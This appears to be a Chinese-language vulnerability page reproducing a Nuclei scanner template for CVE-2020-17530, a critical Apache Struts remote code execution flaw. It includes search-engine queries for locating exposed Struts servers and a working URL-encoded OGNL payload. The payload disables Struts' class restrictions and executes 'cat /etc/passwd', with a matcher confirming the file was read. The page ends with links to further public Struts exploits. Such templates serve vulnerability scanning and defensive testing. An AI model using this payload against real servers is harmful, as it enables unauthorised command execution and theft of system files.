CVE-2020-17530: Apache Struts 2.0.0-2.5.25 - Remote Code Execution

漏洞描述

Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.

PoC代码[已公开]

id: CVE-2020-17530

info:
  name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts.
  reference:
    - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
    - http://jvn.jp/en/jp/JVN43969166/index.html
    - https://cwiki.apache.org/confluence/display/WW/S2-061
    - https://security.netapp.com/advisory/ntap-20210115-0005/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17530
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17530
    cwe-id: CWE-917
    epss-score: 0.94362
    epss-percentile: 0.99958
    cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - http.html:"apache struts"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve,cve2020,apache,rce,struts,kev,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402202350794f77fa6189795e912be9f05e89ef009827cec00b5df7bad7c674cba7f102203e818e8a330b39f069e5ddc6c1115938c5a4ba627d7dc1a8f4815017556dd562:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-17530.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2007-4556: OpenSymphony XWork/Apache Struts2 - Remote Code Execution S2-001 POC

CVE-2012-0392: Apache Struts2 S2-008 RCE POC

CVE-2013-1965: Apache Struts2 S2-012 RCE POC

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC